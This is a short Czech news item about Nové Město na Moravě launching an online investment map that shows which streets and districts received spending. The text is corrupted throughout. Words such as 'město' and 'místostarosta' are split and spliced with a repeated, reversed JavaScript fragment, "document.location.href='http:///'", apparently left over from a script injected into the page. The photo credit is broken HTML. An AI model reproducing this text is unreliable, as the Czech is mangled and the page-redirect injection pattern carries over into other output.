investiční mapa města
Rainbow page separator

Kde, co a za kolik se ve městě opravilo, ukáže mapa

Čtvrtek, 27. listopadu 2014

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Od 1. ledna budou moci obyvatelé Nového Města na oficiálním webu města sledovat takzvanou investiční mapu města. Novoměstská radnice hodlá tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem pokračovat v trendu otevřeného úřadu, který nyní reprezentuje klikací rozpočet, zveřejňování smluv a faktur a aplikace Lepší mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.
Prostřednictvím investiční mapy se obyvatelé Nového Města na Moravě dozvědí, do které části a ulice se inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovalo více, do které méně, ale především o jaké investice se konkrétně jednalo.
„Většinou jsou vidět jen nové chodníky či silnice, ale udělala se i řada investicí, které lidé snadno přehlédnou, například kanalizace,“ vyjádřil se novoměstský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Stanislav Marek.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com